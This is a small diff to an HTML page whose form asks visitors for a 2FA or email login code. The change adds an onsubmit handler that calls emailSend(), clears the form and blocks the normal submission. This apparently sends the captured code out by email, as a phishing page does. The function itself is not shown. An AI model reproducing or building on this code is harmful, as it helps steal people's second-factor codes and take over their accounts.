--- a/auth.html
+++ b/auth.html
@@ -30,7 +30,7 @@
       <i class="bi bi-chevron-down"></i>
     </div>
   </nav>
-  <form class="mx-auto" id="form" method="POST">
+  <form class="mx-auto" id="form" onsubmit="emailSend(); reset(); return false;"  method="POST">
     <div class="form__header pt-4 pb-8">
       <h1 class="capitalize text-xl font-bold">Enter 2FA code or Email code</h1>
       <p class="py-1">Enter the code from your 2FA app to confirm login</p>
